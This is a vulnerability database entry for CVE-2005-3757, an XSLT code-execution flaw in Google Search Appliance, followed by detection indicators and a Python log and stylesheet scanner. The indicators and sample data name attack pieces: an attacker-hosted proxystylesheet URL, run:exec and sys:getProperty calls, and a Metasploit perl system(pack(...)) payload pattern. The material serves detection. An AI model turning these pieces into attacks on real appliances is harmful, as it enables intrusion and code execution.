CVE-2005-3757
published 2005-11-22

Priority P346 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 42.18% (98.5th percentile)
The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in the select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.

Detection & IOCs (extracted from sources)

  • path: /search
  • other: proxystylesheet=http://<attacker>/
  • other: proxyreload=1
  • other: output=xml_no_dtd
  • Detect outbound connections from the Google Search Appliance to attacker-controlled hosts triggered by the proxystylesheet parameter; the appliance fetching an external XSLT stylesheet is the exploitation vector.
  • Monitor for XSLT stylesheets served to the appliance containing Java method calls such as system-property, sys:getProperty, or run:exec in xsl:value-of select attributes, which are the payload delivery mechanism.
  • Detect the exploit payload pattern: XSLT content containing ':x:MSF:x:' placeholder replaced with a /usr/bin/perl -e system(pack(...)) command string, indicating Metasploit-generated malicious stylesheets.
  • The exploit requires the target Google Search Appliance to be able to make outbound HTTP connections back to the attacker's machine; network egress filtering on the appliance will block exploitation.
  • Google released a patch (advisory GA-2005-08-m) in August 2005; patched appliances return 'ERROR: Unable to fetch the stylesheet' and are not exploitable via this vector.
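The first two detection points above can be turned into a log and content check. This is an added example, not code from the advisory, Google, or the sources this page draws on. It assumes combined-format access logs in front of the appliance, that a normal proxystylesheet value names a local front end rather than a URL, and a hypothetical allowlist host; the log lines and stylesheet are constructed samples.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the appliance may legitimately fetch stylesheets from.
ALLOWED_STYLESHEET_HOSTS = {"intranet.example.internal"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
VALUE_OF_RE = re.compile(r'<xsl:value-of\b[^>]*?\bselect\s*=\s*(["\'])(.*?)\1', re.S | re.I)
# Function names from the CVE text; prefixes are author-chosen, so match the local name.
DANGEROUS_CALL_RE = re.compile(r'(?:\bsystem-property|:getProperty|:exec)\s*\(')

# Constructed sample data (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Jan/2006:10:00:00 +0000] "GET /search?q=test&proxystylesheet=default_frontend&output=xml_no_dtd HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2006:10:00:05 +0000] "GET /search?q=test&proxystylesheet=http%3A%2F%2F203.0.113.7%2Fs.xsl&proxyreload=1&output=xml_no_dtd HTTP/1.1" 200 512',
]
SAMPLE_XSLT = '''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="sys:getProperty('os.name')"/>
    <xsl:value-of select="title"/>
  </xsl:template>
</xsl:stylesheet>'''

def external_stylesheet_requests(log_lines):
    """Return (line, host) for /search requests whose proxystylesheet is an off-list URL."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != "/search":
            continue
        for value in parse_qs(url.query).get("proxystylesheet", []):
            target = urlsplit(value)  # parse_qs has already percent-decoded the value
            host = (target.hostname or "").lower()
            if target.scheme in ("http", "https") and host not in ALLOWED_STYLESHEET_HOSTS:
                hits.append((line, host))
    return hits

def dangerous_selects(xslt_text):
    """Return xsl:value-of select expressions that call one of the flagged functions."""
    return [sel for _, sel in VALUE_OF_RE.findall(xslt_text) if DANGEROUS_CALL_RE.search(sel)]

if __name__ == "__main__":
    print([host for _, host in external_stylesheet_requests(SAMPLE_LOG)])
    print(dangerous_selects(SAMPLE_XSLT))
```

system-property is also a standard XSLT function, so treat a match on it alone as a lead to review rather than a confirmed payload.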